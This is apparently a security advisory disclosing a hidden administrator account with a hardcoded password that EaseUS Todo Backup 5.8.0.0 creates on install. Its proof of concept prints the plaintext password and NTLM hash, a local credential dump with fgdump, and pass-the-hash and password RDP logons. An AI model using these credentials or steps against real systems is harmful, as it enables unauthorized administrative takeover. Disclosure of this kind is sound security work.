EaseUS Todo Backup 5.8.0.0 Hardcoded Password

`  
Vulnerable Software:   
========================================  
EaseUS Todo Backup 5.8.0.0 (build 20130321)  
  
http://oi62.tinypic.com/108i4ut.jpg  
========================================  
Vuln: Hardcoded Administrative Password./Potential backdoor.  
========================================  
Impact:  
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes.   
========================================  
About software:  
  
Designed for small and medium-sized businesses.  
Simplify backup & recovery management to minimize server downtime and ensure business continuity  
========================================  
Vuln details:  
  
EaseUS Todo Backup 5.8.0.0 (build 20130321)   
(other versions may also suffer from this but not tested)  
  
when installing it on your machine creates hidden Administrative local account on your machine with hardcoded/broken password.  
  
But this can be abused by remote attackers as well.  
Using this administrative account remote/local attacker may completely compromise target machine.  
  
  
  
  
Here is few Proof of concept demonstrations:  
  
  
*Before installation ("net user" command on target machine)*  
  
C:\Users\Administrator>NET USER  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator Guest  
The command completed successfully.  
  
  
*After installation complete: (Notice: we've got new local administrative account in silent manner!)*  
  
C:\Users\Administrator>NET USER  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator ETB User Guest  
The command completed successfully.  
  
  
C:\Users\Administrator>NET USER  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator ETB User Guest  
The command completed successfully.  
  
  
C:\Users\Administrator>control userpasswords2  
  
C:\Users\Administrator>cd Desktop  
  
C:\Users\Administrator\Desktop>fgdump.exe  
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net  
Written to make j0m0kun's life just a bit easier  
Copyright(C) 2008 fizzgig and foofus.net  
fgdump comes with ABSOLUTELY NO WARRANTY!  
This is free software, and you are welcome to redistribute it  
under certain conditions; see the COPYING and README files for  
more information.  
  
No parameters specified, doing a local dump. Specify -? if you are looking  
elp.  
--- Session ID: 2014-03-22-05-13-53 ---  
Starting dump on 127.0.0.1  
  
** Beginning local dump **  
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)  
Passwords dumped successfully  
Cache dumped successfully  
  
-----Summary-----  
  
Failed servers:  
NONE  
  
Successful servers:  
127.0.0.1  
  
Total failed: 0  
Total successful: 1  
  
  
  
  
C:\Users\Administrator\Desktop>net user  
  
User accounts for \\WIN-CE1QUVOKT1H  
  
---------------------------------------------------------------------------  
Administrator ETB User Guest  
The command completed successfully.  
  
  
C:\Users\Administrator\Desktop>net user "ETB User"  
User name ETB User  
Full Name ETB User  
Comment For EaseUS Todo Backup Central Management Cons  
User's comment  
Country/region code 000 (System Default)  
Account active Yes  
Account expires Never  
  
Password last set 3/21/2014 10:12:52 PM  
Password expires Never  
Password changeable 3/21/2014 10:12:52 PM  
Password required Yes  
User may change password Yes  
  
Workstations allowed All  
Logon script  
User profile  
Home directory  
Last logon Never  
  
Logon hours allowed All  
  
Local Group Memberships *Administrators  
Global Group memberships *None  
The command completed successfully.  
  
  
C:\Users\Administrator\Desktop>  
  
  
  
C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump  
---------- SNIP ----------------  
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:  
---------- SNIP ----------------  
  
  
This hardcoded administive password filtrates in wild:  
  
Pass: ~1EaseUs@AcsT  
  
http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6  
  
  
  
  
Trying to logon to this account:  
  
  
Microsoft Windows [Version 6.3.9600]  
(c) 2013 Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
win-ce1quvokt1h\etb user  
  
C:\Windows\system32>whoami /all  
  
USER INFORMATION  
----------------  
  
User Name SID  
======================== =============================================  
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001  
  
  
GROUP INFORMATION  
-----------------  
  
Group Name Type S  
ID Attributes  
============================================================= ================ =  
=========== ==================================================  
Everyone Well-known group S  
-1-1-0 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Local account and member of Administrators group Well-known group S  
-1-5-114 Group used for deny only  
BUILTIN\Administrators Alias S  
-1-5-32-544 Group used for deny only  
BUILTIN\Users Alias S  
-1-5-32-545 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\INTERACTIVE Well-known group S  
-1-5-4 Mandatory group, Enabled by default, Enabled group  
CONSOLE LOGON Well-known group S  
-1-2-1 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Authenticated Users Well-known group S  
-1-5-11 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\This Organization Well-known group S  
-1-5-15 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\Local account Well-known group S  
-1-5-113 Mandatory group, Enabled by default, Enabled group  
LOCAL Well-known group S  
-1-2-0 Mandatory group, Enabled by default, Enabled group  
NT AUTHORITY\NTLM Authentication Well-known group S  
-1-5-64-10 Mandatory group, Enabled by default, Enabled group  
Mandatory Label\Medium Mandatory Level Label S  
-1-16-8192  
  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State  
============================= ==================================== ========  
SeShutdownPrivilege Shut down the system Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled  
SeUndockPrivilege Remove computer from docking station Disabled  
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
SeTimeZonePrivilege Change the time zone Disabled  
  
  
C:\Windows\system32>exit  
  
  
Testing for lovely Pass The Hash technique:  
Result is successfull against Server 2012 R2  
  
  
  
[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103  
WARNING: Using deprecated command-line interface!  
-p ****** -> /p:******  
-u ETB User -> /u:ETB User  
192.168.1.103 -> /v:192.168.1.103  
connected to 192.168.1.103:3389  
Closed from X11  
  
PIC 1:  
http://oi58.tinypic.com/2z8b7t4.jpg  
  
  
  
  
  
  
Or using valid and hardcoded+known credentials:  
  
[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103  
Autoselected keyboard map en-us  
Connection established using SSL.  
WARNING: Remote desktop does not support colour depth 24; falling back to 16  
  
  
  
PIC 2:  
  
http://oi60.tinypic.com/2j459pk.jpg  
  
  
  
  
  
===================== WITH LOVE FROM AZERBAIJAN ========================  
  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
insecurety.net  
millikuvvetler.net  
b3yaz.org  
  
Special respect's to CAMOUFL4G3 && ottoman38 and to all   
Azerbaijan Black hatz,Aa team && to All Turkish hackers.  
  
/AkaStep  
  
  
  
  
`